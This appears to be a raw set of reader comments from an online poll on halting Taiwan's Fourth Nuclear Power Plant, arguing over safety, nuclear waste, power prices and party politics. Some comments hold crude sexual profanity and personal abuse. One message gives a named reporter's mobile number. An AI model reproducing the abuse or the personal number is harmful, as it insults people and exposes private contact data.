<br><br>核四有一些風險,坐飛機也有風險,開汽車風險更大,走在路酒駕車會來鑽你,這些一定比核四風險還高,那是否禁止開車,火車汽車都不要,火力發電廠有?梁,汽車廢氣也?染,這些都是工業革命產生的反作用力,而且越來越越嚴重,有一天人類因此而無法生存,因此答案就是這些工業革命的產物也都要廢掉,回到古代生活也可以活得好好的,而且相信活得更快樂,你一定
<br><br>核四如果爆炸/台灣就毀了
<br><br>核四如停建電力不足影響外資投入,且電費上漲可以廢核一、二,三保存最新的核四。
<br><br>核四存廢,有人要上街頭抗議;核四廢,電價漲,又有人抗議....乾脆不要廢好了!! 核一核二核三,役齡將至,沒有核四,勢必要多蓋水火風力發電廠,要蓋在那?? 要多蓋電廠,又要多花政府的預算....
<br><br>核四安全有疑慮,資訊不對等。
<br><br>核四安全使人疑慮?
<br><br>核四沒有不好也沒有說一定不好
<br><br>核四的工程根本沒有承包商能夠勝任,
<br><br>核四的安全令人懷疑,應該想辦法在最短時間內解決,而不是停建他,這樣只會變成浪費多年來納稅人的金錢,而且停建核四就代表電價會繼續上漲,建核電廠是臺灣唯一叫有效率的發電方式,但核四的安全問題應盡快解決。
<br><br>核四的啟用不是單純的電力事業,還牽涉了台灣未來在國際上的經濟競爭力及政治自主地位。倘若沒有了核電,台灣缺少自主能源,勢必需要向他國購買能源,而與他國進行交涉時,很容易會被他國脅制,例如要買煤時,會說要買可以,但也要順便買戰機…諸如此類,故拒絕核電時真的要慎重考慮台灣是否本錢足夠雄厚,可抵得住他國在經濟上的攻掠。
<br><br>核四服貿都要否則經濟瀟條各行業不敢投資跑光了才是問題
<br><br>核四是未來的希望,一定要建。
<br><br>核四是台灣最後一個核電廠,畢竟花那麼多錢了,且科技也在進步,相信民主與科學是可以一起存在的,台灣加油!
<br><br>核四是危險的,臺灣政客為了賺錢不惜人民的生命安全、枉?人民期望,應予以廢除核四。
<br><br>核四是安全的
<br><br>核四是既定利益者藉用電需要行貪婪之實
<br><br>核四是新車,最新,最大,最安全,離開臺北都會最遠,當然要?它快快完工,快快?動,好讓核一,核二按年資逐漸退休,或封存。豈有做了新屋不完工,屋齡舊的?續用的笨蛋!
<br><br>核四若十年前停建損失較小、現在就快完工封存損失更大、花了三千多億、說停就停沒道理、我對核四有信心、對核一核二可按計劃停止運轉才對
<br><br>核四能促進經濟發展
<br><br>核四除役後,永不使用核電。
<br><br>核四停工,為何要完工?只因前金拿了!後謝金尚未入袋!
<br><br>核四停電費漲持續抗爭惡性循環核四停建造費人民買單核四停建要保養人民買單核四停要開發新能源人民買單核四停建材像廢物能不能仔細考慮清楚別盲目做決定能停但能不能先緩緩!!操!
<br><br>核四現在停建台灣就垮了
<br><br>核四都建一半了!現在不繼續蓋,之前所花費的錢都浪費了!
<br><br>核四這種四不像的吃錢怪物不得上路!
<br><br>核四就像拼裝車!!
<br><br>核四會污染
<br><br>核四經歷了一二十年的建設換來了只是一個豆腐渣工程
<br><br>核四運轉後,就可停核一、二、三。
<br><br>核四運轉這議題,撇除我們到底需不需要這些電力來源外的先決條件,應該是要先提出妥善核廢料處理方法,以及若因天災釀成災害的防範方法,全世界都在講永續經營,開發綠能發電了,我們應該要向前看,而且是遠方
<br><br>核四運轉 立刻移民 掰掰鬼島
<br><br>核四廢存是專業的評估及決定,決定。不可以公民投票
<br><br>核四廠破壞了美麗的沙灘和海岸風景
<br><br>核四請停建
<br><br>核四確實停止不能運轉
<br><br>核四應該停止 !
<br><br>核四營運,同時開發新能源。新能源穩定供應後再全面廢除核電。
<br><br>核四雖然在前段建設因停工效應讓人們認為瑕疵太多,但是經過長年的再建設,多方勘驗下,問題少;再說台灣地小各種替代能源根本無從解決,如果日本可以的,我們才有可能有替代方案。
<br><br>核四續建。加油!
<br><br>核四續建。核一,二廠提前除役。
<br><br>核四續建
<br><br>核四嚴格?督運?、核一核二核三慢慢廢除、
<br><br>核安不安?生命無價
<br><br>核安才是重點
<br><br>核安沒有保障?生命無價
<br><br>核安是不能確定的。生命是無價的
<br><br>核安問題不應由民眾全買單
<br><br>核安問題
<br><br>核安與核電應分開處理
<br><br>核事故後,台灣的飛機沒有我的座位。
<br><br>核災安全,人人有責。全民建設,公正公開,杜絕黑金回扣!
<br><br>核災滅國,若無法保證安全性,我願接受電價上漲,也不願家人受害!
<br><br>核能仍是未來世界低廉可靠之能源主流之一,若因有可能發生災害,而無知的為反而反,不是要全國自廢武功,不求長進?
<br><br>核能比燃煤乾淨,安全可以控制。
<br><br>核能本就是不需要存在的東西,之所以存在就因為大家太過於仰賴電的所需
<br><br>核能成本較低,排碳較少,為何不用!唯一風險是核災,但機率不高,核安是重點,該耽心的是核一二三,怎麼會先停核四?!又是民粹下的犧牲品。
<br><br>核能安全否視運?條件及人員執行是否正確而定,飛機也是,那為何那麼多人在坐,不理性反對無知別有用意。
<br><br>核能固然有可取之處
<br><br>核能很危險,付出的代價不是我們世代付得起,所以我反核。
<br><br>核能是一個無法犯錯的選項, 一犯錯即無死所, 而人總是會犯錯. 我們不該剝奪孩子的權利.
<br><br>核能是怪物
<br><br>核能是最乾淨的能源
<br><br>核能風險與替代方案
<br><br>核能專家評鑑不及格而且分數接近零分
<br><br>核能這東西,能控制得好,就不危險;反倒覺得火力發電是最不環保的。現在的問題是:核廢料的處理。
<br><br>核能殘害身體
<br><br>核能發電,危害後代,危害地球村,萬萬行不得!
<br><br>核能發電的優點勝於其它高耗能、高成本、大量碳排放的發電方式。
<br><br>核能發電是趨勢,以現今的科技需求,用電量只會越來越大,都花那麼多錢了,與其吵要不要封或建,不如大家想想怎麼把核電廠蓋的更安全,怎麼處理高階核廢料的問題才是治根吧。
<br><br>核能發電效率高,低排碳低汙染,發電成本低.
<br><br>核能發電減碳低污染
<br><br>核能發電對我們這一些民眾來說雖然很重要,可以發電,但是會汙染空氣,所以我選不支持!
<br><br>核能電廠不可怕。
<br><br>核能電廠也是另一種被動式防?武器,廢核四,最高興的應該是中共,以後恐怕連對話空間都沒有。
<br><br>核能賺的是政府
<br><br>核能?未來發展必要的選擇
<br><br>核費料會讓台灣消失,一定要停建,感恩 ~
<br><br>核電?乾淨?便宜?夏季電價照漲。福島居民何時回到自己的家,受害的基層百姓只有問天公?上帝?阿拉?核能應該問達悟族?願意接受核射線長期照射,飛魚不再?身上載滿小核彈
<br><br>核電以經存在60年以上才發生3次意外,多安全呀,為了反核得肺癌,真的肖仔,你得肺癌富邦董娘會買標靶要給你嗎?林義雄會為你禱告而已。
<br><br>核電有利於民生用電,經濟澎湃,不會損害大自然臭氧層,及更多利國利民,但重要的是維護保養!
<br><br>核電的發展,對經濟&軍事有益。
<br><br>核電非建與不建的問題~而是台灣如此小如何存放核廢料,核電跟本是禍害遣千年的產物,早該全面禁止~寧願點蠟燭也不願核電,支持非核家園,現代人應該有的社會責任價值觀。
<br><br>核電是世界上目前唯一不?染環境的能源,只要安檢通過應可?動,並且要求嚴格管控得宜。
<br><br>核電效益優於其它能源
<br><br>核電號稱乾淨卻要命,安檢只是障眼法,我們開的車那部沒經過安檢,
<br><br>核電廢除是必須,它只是政客和電力公司的領錢桶!廢核電會世界人民!
<br><br>核電廠只要安全把關 它是最節能減碳的能源
<br><br>核廢料一天無法解決,就沒資格談核能發電,更不必談投報率!
<br><br>核廢料半衰期太長了例如鈽238的半衰期就長達7億2萬4000年。
<br><br>核廢料有多危險還不夠清楚嗎
<br><br>核廢料放馬英九家我就支持!
<br><br>核廢料放總統府讓總統官員感受蘭嶼和桃園居民的心聲?
<br><br>核廢料是下一代子子孫孫的噩夢。
<br><br>核廢料是最大問題,相信沒人要存放在自己家園。
<br><br>核廢料毒害地球的成本高於任何價值
<br><br>核廢料根本沒有解決的辦法,使用核能只是把問題留給後代
<br><br>核廢料都無法處理,核災如果發生,那個政府有能力處理?告訴人民。
<br><br>核廢料無法處理,會帶給人類及生物莫大的傷害,且綠色能源是現在及將來都必須做的,所以愛自己也愛您的下一代美好環境,請大家拒絕核能發電。請將無害有益的建設留給下一代吧!
<br><br>核廢料跟本沒地方處理,如果算上核廢料處理費用,核能是比較貴的。
<br><br>核廢料應該放蕭家祝家裡
<br><br>核廢料儲存的真象?
<br><br>核頭己剪,不如把它完成,以新棄舊,兩全其美!
<br><br>核1、2除役,核四在專業評核安檢後贊成?動
<br><br>核123都運作多久了,咱臺灣人有怕過嗎,核4那些什麼風險的,什馬都是浮雲。臺灣向前行!
<br><br>核4不能停,。(原因是收傭金、回扣的人護航,)
<br><br>核4必須運轉
<br><br>核4停建
<br><br>核4弊大於利
<br><br>核4廠完成,要不要起用才有人民決定,不把核4完工又要賠償廠商違約金。違約金是我們交稅金也。
<br><br>根本不愛台灣、不愛人民
<br><br>根本就不可能也不應該讓核四運轉,所以不需要燃料填充多餘的動作!
<br><br>根據美國芝加哥核能製造公司前?理人表示現代建的核能廠比從前建的更安全。?
<br><br>娘
<br><br>能原在海島自然發電無法幫助工業的電力,但我們要生存。
<br><br>能源不能少,核四繼續搞。
<br><br>能源不夠使用,對國家經濟不好
<br><br>能源一定會有用完的一天~科技天天在進步~有經濟效益更高的能源~遲早會用上
<br><br>能源政策乃國家百年大計,不容無任何替代方案下因民粹而停建
<br><br>能源政策和經濟發展要整體評估,核能不能喊廢就廢,確定政策、找出替代能源、漸進減核才是理性作法
<br><br>能源替代方案要確認才能談停建與否
<br><br>草
<br><br>留言
<br><br>留的青山在不怕沒材燒
<br><br>留給台灣後代子孫一片永續經營的福田!
<br><br>真正有價值的民意不應該只懂喊出破壞跟反對。當你決定說出反對時,請你也同時拿出對人民有幫助的智慧,否則不免讓人懷疑你的反對論述是否只存在僅屬於你貪婪的己私。不用核電台灣靠什麼能源? 沒錯,服貿繼續封鎖台灣繼續鎖國,那時的確不會有用電問題了。
<br><br>真沒想到不顧下一代的人這麼多‧‧‧‧
<br><br>真的嗎?
<br><br>除了發電廠本身的危險外,更應該重視核廢料的問題~
<br><br>除有替代方案,不要開玩笑性質,操弄國家財政。
<br><br>除非有人自願接收核廢料
<br><br>除非有好的配套
<br><br>除非有更多在未來不增加民生支出的配套措施的議題之下,本人才會支持廢除或停建核四、、、、
<br><br>除非你能保證台灣不會發生大地震萬一大地震造成核災台灣這麼小你能逃到那兒大官大老闆有私人飛機可以逃走只有小老百姓該死!
<br><br>除舊佈親
<br><br>馬上停止核四
<br><br>馬先生不是要減碳嗎?這樣會更多ㄟ!他瘋了嗎?
<br><br>馬英九下臺,國民黨下臺
<br><br>高薪聘請專業團隊接管酬庸團隊
<br><br>鬼話連篇
<br><br>乾淨的環境留給下一代
<br><br>停止!!
<br><br>停止地球暖化
<br><br>停止吧!
<br><br>停止建造好!但是若到時電費又漲請民眾們別該該叫
<br><br>停止核四,才能永保台灣寶島。
<br><br>停止核四,永保台灣寶島
<br><br>停止核四,還孩子無害家園
<br><br>停止核四!
<br><br>停止核四建設
<br><br>停止核四
<br><br>停止核四?設
<br><br>停止核建
<br><br>停止核1&2!
<br><br>停止高污染火力發電廠,避免破壞環境,成立緊急研究小組開發替代方案。
<br><br>停止蘋果大嘴謊話連篇
<br><br>停止
<br><br>停一二三機組開四號
<br><br>停件同時要配套方案同時出來,不可只停建不作取代方案
<br><br>停建,又沒替代方案!
<br><br>停建,廢掉。
<br><br>停建!給子孫留下美好環境!
<br><br>停建未來產業出走,台灣人民苦日子來臨。
<br><br>停建只會讓台電無限上漲電價,有錢人跟本不在呼電價
<br><br>停建好啊~政府給地我們種田巴!還能過上鄉野生活~
<br><br>停建吧!
<br><br>停建是對的台灣那麼小、只是要停之前也要盡快找到電力的方案及來源、問題不能再拖了要快
<br><br>停建核四,生命無價,不能有任何萬一。
<br><br>停建核四,捍衛民主
<br><br>停建核四,經濟去逝
<br><br>停建核四,還我乾淨的家園
<br><br>停建核四!
<br><br>停建核四可能會核一核二延長運作
<br><br>停建核四後,以後電源從那裡來,不如加強核安檢查,確認安全無慮後才運轉。
<br><br>停建核四是主流民意
<br><br>停建核四啦
<br><br>停建核四
<br><br>停建核4
<br><br>停建會衝擊經濟是一時的,但也會帶動其他更多的行業,會有更值得期待的未來!
<br><br>停建
<br><br>停核四以後要用的能源如何取得
<br><br>停掉核四
<br><br>假民意,非常值得思考的蘋果大嘴?
<br><br>假民調,假結果
<br><br>假如台灣像日本這樣大地震
<br><br>假設大海是淡水,誰還要抽地下水
<br><br>做事有效率、有產值
<br><br>做就對了~
<br><br>健康價更高
<br><br>啊什麼都不要回遠古時代過活好大家做得到嗎
<br><br>問題有欠缺考慮,核四可以建好但不裝機不運作,為另一選項
<br><br>國內生命財產以及世世代代子孫生活徹底廢除核四
<br><br>國民黨不可信
<br><br>國民黨應全面撤出台灣
<br><br>國家發展經濟!
<br><br>國家競爭力
<br><br>衹有2個選項,無法完整的表達除此二項之外人民的意見。
<br><br>記住希臘的教訓,兩黨無謂之爭,讓全民陷於萬劫不復。
<br><br>控制不好 也是百姓受苦
<br><br>救經濟
<br><br>啟用核四,停止其他核電廠
<br><br>曹
<br><br>強化國家競爭力
<br><br>專家沒有具體替代方案,核四勢必續建完工,否則台灣將來國際沒競爭力!
<br><br>您好,我是蘋果日報記者,有民眾擔憂此網路投票是詐騙簡訊,希望能向您求證。請與我聯絡。謝謝。02-66016377
<br><br>您好!我是蘋果日報記者林志青,想請問這個投票網頁的設置,方便與您聯繫嗎?我的手機是0918515094,謝謝!蘋果志青敬上
<br><br>您的投票群只限有智慧手機者,並不儘客觀。
<br><br>您這份問卷可以重覆投票,所以可能可以灌票喔!不宜作為民意指標
<br><br>混蛋
<br><br>現在不停建
<br><br>現在只是核廢料的問題
<br><br>現在台灣政府官員
<br><br>現在的人,習慣吹冷氣,到夏天住在高樓大廈
<br><br>現在的地球上 我們已知的文明當中 沒有任何一個文明有能力興建安全的核能驅動發電廠 所以我支持廢核
<br><br>現在服貿不過也沒核能台灣是還能在地球上喘息多久?
<br><br>現在哪個人不用電?看看比我們進步的國家哪個沒有核電廠?重要的不是停建
<br><br>郭台銘不畏一切站出來真正大快人心,我們支持他並替他加油!!!
<br><br>都不怕嗎,馬英九
<br><br>都吃不下了菜再豐富也沒用,沒那個屁股就不要吃瀉藥。
<br><br>麥苟亂阿 不要核電哪要什麼電 請講出可行的電力來原
<br><br>麥歌亂阿~生活攏麥過阿,電費要在漲,A死啦~
<br><br>麥擱政黨惡鬥~
<br><br>備而不用
<br><br>最好錢多事少離家近,22K怪政府,
<br><br>最近紙風車劇團最新大戲—三國奇遇。筆者親臨二廳院攜子觀賞,但內容涉及目前社會混亂似當年黃巾之亂,喊出退回福貿,員警退後,全民上凱道,自己國家自己救。反諷涿縣小官領有十八趴。導致小孩不懂口號意義,胡亂喊口號。身為家長認為應拒絕泛政治性言論進入校園,去看的都是學生,請問如果學生不讀書,如何救國。每個人的政治立場都應予尊重,但不應在購票觀賞三國故事中強行輸入意識型態,和故事本身毫無關係。
<br><br>最真 無價
<br><br>最起碼也要1/2,始能呈現公投的意義。
<br><br>喊廢核的人,都只是口號,政治化,請問有人可以真正拿出整個配套嗎?
<br><br>單純阻擋個資收集
<br><br>貪官汙吏的核4應該徹底廢除並且徹查金錢流向
<br><br>這小小的彈丸之地不靠核能靠什麼?看看臺灣都少核能專才在先進國家擔任核能要角。
<br><br>這些也會是拖累台灣經濟及增加稅負的主要因素
<br><br>這是台灣98~102年的年耗電量 5年來每年都消耗1900億度左右的電 102年已經破2000億度) 逐年成長率都是1%多
<br><br>這是很現實的問題
<br><br>這是詐騙嗎?
<br><br>這是
<br><br>這個民調有準?
<br><br>這個國家保護的爛汽車品牌
<br><br>這個題目設計有瑕疵。我不喜歡~
<br><br>這真的是一件非常兩難的政策,且此政策很常被拿來當成政治的工具,德國近年來的大選過後,廢核還原核能又廢核,近幾年接我不知道對德國到底到來多少利或弊,以後台灣又該如何我也不知道,但是唯一不變的,希望大家在這次議題下能真正體會到的,不是馬政府如何、也不是遊行造成大量交通堵塞,而是能源他真的得來不易,說實在的,若我們台灣能夠降低許多種無意義電力的使用,電力不會供不應求,自然不需要興建核能廠,若大家真的有心有力與政府一同協商節約方式與更好的能源替代方式,而不是成全執政與在野的仇快,自相斥責殘殺,都不會為台灣帶來更好的明天!
<br><br>這就是台灣人的真面目
<br><br>這詐騙的吧
<br><br>這種比敢面對但沒有做得很好的爛太多了
<br><br>這種民調根本沒有參考價值
<br><br>這網站有問題!!!!!!
<br><br>被取代說真的只是應該的
<br><br>連建核四的廠商都不相信安全的核四,想死就認同吧
<br><br>逐步廢除核能發電
<br><br>造假的
<br><br>敢上街頭就可以!所以應該先廢立法院把錢省下來,做?能源基金!
<br><br>智障民調
<br><br>替代能源、再生能源、自然資源的發電
<br><br>替代能源才是根本解決之道。核1234,燃料棒存放。危險..
<br><br>期間找替代能源
<br><br>朝非核家?努力
<br><br>森林妖精 SM
<br><br>殘酷的事實是,現在大部分的日本人雖不明言,但怕受核害汙染不敢嫁娶福島災區的人,災區受害人猶如賤民.
<br><br>就一定會為了電費貴二度上街
<br><br>就只會越來越爛
<br><br>就長遠來看,核電充滿不安定,但就現階段考量又沒有不得不依賴核電的現實,希望台灣只有核四就好,再也看不到五了
<br><br>就是不要核電,台灣興建的品質就是不如外國,不要自欺欺人害了下一代,
<br><br>就算是停建了
<br><br>就算要核能也不要核四
<br><br>循序漸進,才能永續。
<br><br>等到因電價調整而百物喧騰時,22k的廢核們,不要叫。因為那是你們被利用後應付的代價!
<br><br>結果是騙人的、那可能
<br><br>給居住在台灣人民生活免於恐懼
<br><br>善用核四、再逐步將舊核電廠停止運做。做到安全又環保。
<br><br>視經濟需求
<br><br>無!
<br><br>無天然資源的台灣,政治已是混亂,若再經?衰退,就是「第二個烏克蘭」了。
<br><br>無法承擔所造成的傷害,那怕是億萬分之一的可能性
<br><br>無法處理核廢物就不該建核電廠
<br><br>無法處理核廢料,就不能續建核四,今天政府為什麼不能?停建?因為拿回扣的人實在太多了!
<br><br>無法處理廢核料就不能再欺騙人民!
<br><br>無限期支持核四廠廢止
<br><br>無核四要限電或漲電費百姓願意嗎
<br><br>無核家園
<br><br>無聊
<br><br>無
<br><br>然後之後又來罵政府
<br><br>然後想好核廢料的處理配套
<br><br>發展太陽能光電
<br><br>發展再生能源才是長久之計
<br><br>發展臺灣得天獨厚的太陽能電力
<br><br>發達國家幾乎都有核電
<br><br>發電方法並非只有核能,但是核廢料確會影響台灣百年~
<br><br>發電效率高,成本低
<br><br>順應天理循環
<br><br>傳一些狗屁簡訊給我幹嘛
<br><br>嗯
<br><br>詐騙?
<br><br>詐騙集團掰掰
<br><br>詐騙集團?
<br><br>貴單位的民調題目引導性非常強烈,調查出來的民意非常好利用,不是嗎?
<br><br>開核四陸陸續續關核一核二核三
<br><br>開發再生能源
<br><br>開源:太陽能帽子
<br><br>當下沒替代方案,要用電就別廢話!
<br><br>當全世界都朝著無核家園的目標前進。我不懂當政的獨裁者為何一意孤行
<br><br>當妳們廢核四時,你們有想過到時電要那裡來,電價會狂漲,公司,公廠電不夠用,到時又要上街抗議嗎
<br><br>當初拒絕這些的是哪些人?
<br><br>當初建核4時由李總統主張建的,到陳水扁時強烈要建的,現在馬政府在幫民進黨完成之前的爛攤子,林義雄做什麼秀,我們為什麼失業這麼多民進黨要負責任,每當外資要來投資、一群爆民來抗爭最後人家都轉到他國投資,因此這就是自己在鎖自己的出路,而民進黨在教育下一代就是永遠都是別人的錯請深思一下!如何救台灣
<br><br>當初要建立,相信就知道其危險性。而且使用這麼多年還是缺電。花了2/3的費用。只要剃除危險、確實安檢。為什麼不用。看看日本!經過之前的大災難,如今還是要再建。受難的人也沒出來抗拒,對政府更沒抗議動亂。為什麼?台灣!太自由了,但台灣並不民主?口中說的話!心裡想的事!抗議的行為、態度。都( 偽 )反其「 正確、正當 」性。((你們不代表 **我**))更不代表全國其他的人。
<br><br>當初說要建核四,應該是在日本核電廠爆炸之前,但現在我們都看到了日本核爆的嚴重性!是否真的要認真思考一下?台灣也多地震颱風?謹慎一點是好事
<br><br>當時民進檔喊停賠款無數,又在其執政時,又復建。當時林義雄還是主席,他為何不絕食?
<br><br>當核四發生意外時就什麼都沒,但沒有核四呢,國家還在百姓還在家還在就有希望就有辨法就有幾會
<br><br>當與台灣以輸出國為倒向的日、韓、都以較廉價的能源成本-核能發電為支援部分能源時,台灣必須唯持同水準的競爭力。
<br><br>幹你娘的每天發垃圾訊息
<br><br>幹你娘婊子幹的婊子養的,臭詐騙我肏肏肏你媽的屄
<br><br>幹你娘黨工去死吧
<br><br>幹你娘爛核四還有祭止元
<br><br>幹你娘耖雞掰
<br><br>幹你媽的 騷擾的屁阿操
<br><br>幹妳媽的垃圾網站
<br><br>搭乘飛機、遊艇、公車、騎車都有風險,只要控管得宜,都很安全,核電也是一樣。
<br><br>幹哩娘賽嘴!
<br><br>幹
<br><br>幹 你有病
<br><br>微言??china?
<br><br>感謝你把秘密告訴大家
<br><br>想要享受用電的各種好處,及便宜的電價又沒有其他供電的來源,光是用嘴巴講可以用火力發電等等,大家都知道台灣沒有任何天然資源,短期或許可以用火力發電但是日子久了還是會有其他問題發生,包括地球暖化燃料缺乏等等,不然為什麼歷經3位的總統,也經歷了做做又停停,到現在都已經接近了完工階段了才又要來喊停呢?喊停的話如果可以那投資下去的錢他們要賠出來嗎?任何政府做事情不能不負責任!核四運轉核一核二核三停止才是正確的,(到目前為止最好的決策是如此)。
<br><br>愛台灣!
<br><br>愛護地球 廢除核四
<br><br>新加坡行,為什麼臺灣不行。
<br><br>新的東西不用,是什麼心態?
<br><br>新的續建,舊的適時除役。
<br><br>會污染環境
<br><br>會因為廢了核四上街
<br><br>會回應積極投票的多辦會是反對的居多,因為設計這問題認知上的直覺主觀反應,有利反對方.
<br><br>該建但是要安全
<br><br>該革命了
<br><br>試問性能好的汽車,節約能源,是否也因或許會因超速造成車禍,而大家群起反對之?
<br><br>跟外面所有民調剛好相反
<br><br>經濟好壞是一時,核災難一發生什麼都沒有,家只有安全才是家。
<br><br>經濟為主
<br><br>經濟是強國的根本
<br><br>經濟要死了
<br><br>經濟復疏
<br><br>經濟會比較好
<br><br>經濟環境變差,不管是老百姓還是企業資金,肯定會出走尋找更有價值的市場。
<br><br>禁止建核四
<br><br>節流:晚上10點後公用路燈減半
<br><br>團體,政黨,學者!
<br><br>寧願沒電、也不願意毀滅家園
<br><br>寧願經濟停滯也不要核災時家破人亡
<br><br>察帳!把惡蟲抓出來!
<br><br>對抗中國到底
<br><br>對事不對人,不要一味的抗爭及撕裂,對國家及人民有何好處?慎思!
<br><br>對面一堆核幾拾個還會怕一個核4
<br><br>對核四的安全有疑慮!
<br><br>對
<br><br>徹底核四停建!建立無核家園。
<br><br>徹底停止及停建。
<br><br>徹底停止核四,如果有誰要支持,把核廢料放在他住處旁
<br><br>徹底停止核四的建設
<br><br>徹底停止核四建設,並尊重民意辦理公投
<br><br>徹底停止核四建設,敬請相關部分,優先處理。
<br><br>徹底停止核四建設、第一優先處理。
<br><br>徹底停止核四建設
<br><br>徹底停止核四興建
<br><br>徹底停止興建
<br><br>徹底停止
<br><br>徹底停建核四,積極發展再生能源!!!
<br><br>徹底停建核四
<br><br>徹底終止核四!
<br><br>徹底廢核,以乾淨的太陽能或潮汐發電、風力發電取代,建立台灣為非核家園!
<br><br>徹底廢核,開發替代能源,即使有過渡期,此選擇才是落實永續發展的關鍵一步
<br><br>徹底廢核
<br><br>徹底廢除核四廠。
<br><br>過渡消費是這一代人走向滅亡原因
<br><br>過程中那麼多的會議是假的?
<br><br>電力給人類的文明燦爛、科技、民生工業產品經濟競爭力一切都很重要;但只要我們子孫可能遭遇滅亡與存在的二選一,你還會要選擇有核電核四嗎?何況有替代能源可選用,縱使較貴,我們必能就範節約與無限的研發。
<br><br>電力發展規劃事關民生大計。用電繳費是我們消費者者。那些烏龜政客是不會替你我繳費的。到時電價漲了喊痛的是你我升鬥小民。不要被那些雜碎政客給牽著鼻子走
<br><br>電力管理既然節能減碳又省錢
<br><br>電是國家經濟動力與國民生活息息相關
<br><br>電夠用嗎?
<br><br>電視政策辯論,與大選一起全民公投
<br><br>電費大漲,台灣的經濟如何走下去?電費大漲,全民的生計何去何從?
<br><br>電費漲,人們才會懂得省電,愛地球!
<br><br>電費漲,誰吸收
<br><br>電費漲物假長,還能活到啥時?等餓死嗎?沒核廢料,就沒原子彈,沒原子彈,中國就好欺負我國
<br><br>電費漲價又如何,為了我們的家園,100%支持廢核.
<br><br>電費漲價民生物資也漲價!那些反核是的白癡!到時候又出來喊!生活過不下去政府無能!跺了自己的腳!又不想裝義肢!然後哭天寒地凍說自己不能走!這就是反核四的白癡!
<br><br>電費還會再漲嗎?
<br><br>電費變貴後大家不要亂罵人!
<br><br>電價、用電問題都是幌子
<br><br>電價貴,萬物漲,在未有替代品的狀況下,有更好的方案?現在的台灣人,被媒體嚇壞了!你們的報導可以正、反都理性報導嗎?不要只是一面倒!
<br><br>電價漲大家受的了嗎?!
<br><br>電價漲也沒關係,遲早要面對
<br><br>電價漲就要罵人家祖宗十八代
<br><br>電價穩定,可以吸引外商投資,
<br><br>預測未來可能會有核災一定要絕對徹底大廢除核電,天天都有人在路上車禍死亡受傷真實發生,大家都不要出門不上班不上學,待在家裡很安全,只是為了選票,選舉時一定要百分之百說出絕對要廢掉核四加一二三,未來有沒電用電價漲不漲?選舉前也要提出來自己辦法,可別開出空頭支票。
<br><br>澈底停止核四建設
<br><br>禍延子孫!
<br><br>禍留孑孫,用其它來發電,美國也?了,我們用電沒大國多,為什麼還要建?圖利財團嗎一?
<br><br>禍國殃民子孫
<br><br>稱政客太恭維了,政治垃圾比較恰當。
<br><br>管理只要沒問題,有利於民生經濟的都支持
<br><br>管路都裝錯改來改去要在花多少
<br><br>綠能,再生能源,才是長久之計!
<br><br>綠能美化人生
<br><br>維護家園給下一代安全的環境
<br><br>撤底停止核四建設
<br><br>說停建的又怪電費要漲 要是不停建 哪會造成台電的虧損以致於漲價?
<br><br>趕快開發替補綠能源~給我們下一代更好的環境!
<br><br>臺北市副市長張金鶚和財政部長張盛和會面,喊出要讓房市2年消風3成,這讓前總統李登輝擔憂,首當其衝的會是金融機構,將會呆帳暴增,就連一般自用住宅的民眾也會受害,因為資產縮水3成,甚至會有資金大舉外移的情況,讓經濟雪上加霜!
<br><br>臺灣只有一個。,請不要把無預警?,讓我們人民來承擔。
<br><br>臺灣加油!
<br><br>臺灣地小人稠, 核電廠的興建, 技術比人差, 管理也比人差, 維護能力也比人差。 政府也沒有處理核廢料的能力與發生災難時的能力, 所以臺灣非常不適合蓋核電廠。
<br><br>臺灣核安有日本強嗎?幹嘛騙自己!
<br><br>臺灣國土不大,核三廠就以足夠,無需在新建核四造成核廢料負擔,應立即停建,並且阻止貪官與企業從中圖利。
<br><br>臺灣需要核能,但核四跟本不能用
<br><br>蓋了將近30年雜牌的核電廠那些儀器電子類與鐵管類內部生鏽久沒使用該也須報廢了 像家用電視機不通電或戰鬥機 不飛放20年保證變廢鐵一堆
<br><br>蓋也花、不蓋也花,那就把它蓋完,花最後一次錢,而不是讓美國一直收錢,蓋與不蓋最有利的都是美國,不蓋它可以收到爽,蓋了只能收燃料棒的錢。不蓋收的錢還比燃料棒的錢還多,到底要盲目多久?
<br><br>認清事實。如果反對的人願意帶頭自家停電,排除無核四之後的限電危機,再來想想廢核問題。
<br><br>認清事實才是王道!
<br><br>暫成燃料填充
<br><br>潘朵拉盒子核四絕不能打開!
<br><br>嘴大訴告息消的值價有?認您把請嘴大訴告息消的值價有?認您把請嘴大訴告息消的值價有?認您把請嘴大訴告息消的值價有?認您把請
<br><br>廢止吧
<br><br>廢吧
<br><br>廢核,大家都不用電力,晚上改用蠟燭點燈,所以我支持建核,安全最重要!
<br><br>廢核!!!!!
<br><br>廢核!BJ4!
<br><br>廢核不要懷疑了
<br><br>廢核加油
<br><br>廢核四,永保安康。建議現有核廢料可置於總統府或台電大樓地下室,以昭安全公信。
<br><br>廢核四、推動再生能源!
<br><br>廢核四反服貿
<br><br>廢核四的是白癡
<br><br>廢核四還要廢台電 之持改革把台電變更民營,只會恐嚇人民的畜生 出來跟我單挑 他馬的
<br><br>廢核四
<br><br>廢核有種不要用電
<br><br>廢核沒電,沒電等於沒一切,除非妳有更好的替方案,台灣凡事都需倚賴進口。
<br><br>廢核的前提是要有替代能源 不是出張嘴
<br><br>廢核後,賣天然氣的廠商將更有利,台灣不但受油價每週波動的影響,更受天然氣長期採購契約的限制。
<br><br>廢核保台!
<br><br>廢核是台灣人的責任
<br><br>廢核料如何處置?
<br><br>廢核電從哪裡來?電價漲民生物資全都漲 日子怎麼過?難道以後靠大學生嘴力發電?抗議發電 日子就能過了。
<br><br>廢核與反服貿等議題是有心機的政客們,操弄的手段與技倆!
<br><br>廢核
<br><br>廢除年老危險性高的核1、2、3!!!續建安全性較高的核4!並且發展其他替代能源!直至可以達到非核家圓的理想!
<br><br>廢除並且各種配套盡快去做
<br><br>廢除核四救台灣
<br><br>廢除核四
<br><br>廢除核能,永保家園
<br><br>廢除
<br><br>廢棄的核料如何處理?封存遲早有天會出事。
<br><br>廢棄核四,經濟去逝!
<br><br>廢棄核燃料棒要先能?理,才有資格談核電廠發電營運!
<br><br>彈丸之地也在國際有一席之地
<br><br>德國、瑞士已全面停建核能一自日本311福島核廠事件”之後,他們也開始擔心核能幅射所引起的災難。
